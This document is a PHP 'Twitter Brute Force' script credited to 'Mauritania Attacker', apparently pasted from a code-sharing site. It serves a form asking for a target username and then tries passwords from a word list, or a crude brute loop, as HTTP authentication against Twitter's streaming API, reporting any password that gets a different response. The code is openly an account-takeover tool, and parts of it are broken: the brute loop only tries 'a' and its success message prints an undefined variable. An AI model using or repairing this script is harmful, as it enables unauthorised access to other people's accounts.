Bruteforce script

1. Twitter brute force
2.  
3. $dic ="pass.txt";
4. //////////////////////////////////////////////////////////////////////////
5.  
6.  
7.  
8. echo "
9. <title>Twitter Brute Force By Mauritania Attacker</title>
10. </head>
11. <style type='text/css'>
12. body {
13.  
14.  
15. font:Verdana, Arial, Helvetica, sans-serif;
16. font-size:12px;
17. border-color:#FFFFFF;
18. }
19. .raster_table {
20. background-color:BLUE;
21. border-color:#CCCCCC;
22. }
23. .alert {
24. color:#FF0000;
25. }
26. </style>
27. <body>
28. <table cellpadding='0' cellspacing='0' align='center' class='raster_table' width='75%'>
29. <tr>
30. <td>
31. <div align='center'><b>Twitter Brute Force [PHP] By Mauritania Attacker</b></div>
32. </td>
33. </tr>
34. </table>
35. <table cellpadding='0' cellspacing='0' align='center' class='raster_table' width='75%'>
36. <tr>
37. <td>
38. <div align='center'>
39.  
40. </div>
41. </td>
42. </tr>
43. <tr>
44. <td>
45. <div align='center'>
46.  
47. </div>
48. </td>
49. </tr>
50. <tr>
51. <td>
52. <div align='center'>
53. <form method='post'>
54. Target User:<br>
55. <input name='username' type='text' /><br><br>
56. <input name='attack' type='submit' value='dictionary' /> - <input name='attack' type='submit' value='brute' /><br>
57. </form>
58. </div>
59. </td>
60. </tr>
61. <tr>
62. <td>
63. <div align='center'>
64.  
65. </div>
66. </td>
67. </tr>
68. </table>
69. ";
70. // Sets variables and retrives twitter error for comparing
71. if(isset($_POST['attack']) && isset($_POST['username'])) {
72. $username = $_POST['username'];
73. $headers = array(
74. "Host: stream.twitter.com",
75. "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:23.0) Gecko/20100101 Firefox/23.0",
76. "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
77. "Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3",
78. "Accept-Encoding: text", # No gzip, it only clutters your code!
79. "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7",
80. "Date: ".date(DATE_RFC822)
81. );
82. $c = curl_init('https://stream.twitter.com/1/statuses/filter.json');
83. curl_setopt($c, CURLOPT_HTTPAUTH, CURLAUTH_ANY); // use authentication
84. curl_setopt($c, CURLOPT_HTTPHEADER, $headers); // send the headers
85. curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); // We need to fetch something from a string, so no direct output!
86. curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1); // we get redirected, so follow
87. curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0);
88. curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 1);
89. curl_setopt($c, CURLOPT_UNRESTRICTED_AUTH, 1); // always stay authorised
90. $wrong = curl_exec($c); // Get it
91. curl_close($c); // Close the curl stream
92. }
93. //Dictionary Attack
94. if($_POST['attack'] == "dictionary") {
95. $Dictionary = file("$dic");
96. for ($Position = 0; $Position < count($Dictionary); $Position++) {
97. $Dictionary[$Position] = str_replace("rn", "", $Dictionary[$Position]);
98. if(check_correct($username, $Dictionary[$Position])) {
99. die("<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'>
100. <tr>
101. <td>
102. <div align='center'><b>Found the password of: ".$Dictionary[$Position]."<br> For the account: ".$username."</b></div>
103. </td>
104. </tr>
105. </table>
106. </body>
107. </html>");
108. }
109. }
110. echo "<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'>
111. <tr>
112. <td>
113. <div align='center'><b>Sorry... a password was not found for the account of <span class='alert'>".$username."</span> during the dictionar
114. y attack.</b></div>
115. </td>
116. </tr>
117. </table>";
118. }
119. //Brute Attack
120. elseif($_POST['attack'] == "brute") {
121. for ($Pass = 0; $Pass < 2; $Pass++) {
122. if ($Pass == 0){$Pass = "a";} elseif ($Pass == 1){ $Pass = "a"; }
123. if(check_correct($username, $Pass)) {
124. die("<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'>
125. <tr>
126. <td>
127. <div align='center'><b>Found the password of: ".$Dictionary[$Position]."<br> For the account: ".$username."</b></div>
128. </td>
129. </tr>
130. </table>
131. </body>
132. </html>");
133. }
134. }
135. echo "<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'>
136. <tr>
137. <td>
138. <div align='center'><b>Sorry... a password was not found for the account of <span class='alert'>".$username."</span> during the brute for
139. ce attack.</b></div>
140. </td>
141. </tr>
142. </table>";
143. }
144. echo "</body>
145. </html>";
146. // Function for checking whether the username and password are correct
147. function check_correct($username, $password)
148. {
149. global $wrong, $headers;
150. $c = curl_init('https://'.$username.':'.$password.'@stream.twitter.com/1/statuses/filter.json');
151. curl_setopt($c, CURLOPT_HTTPAUTH, CURLAUTH_ANY); // use authentication
152. curl_setopt($c, CURLOPT_HTTPHEADER, $headers); // send the headers
153. curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); // We need to fetch something from a string, so no direct output!
154. curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1); // we get redirected, so follow
155. curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0);
156. curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 1);
157. curl_setopt($c, CURLOPT_UNRESTRICTED_AUTH, 1); // always stay authorised
158. $str = curl_exec($c); // Get it
159. curl_close($c);
160. if($str != $wrong) {return true;}
161. else {return false;}
162. }
163.  
164. ?>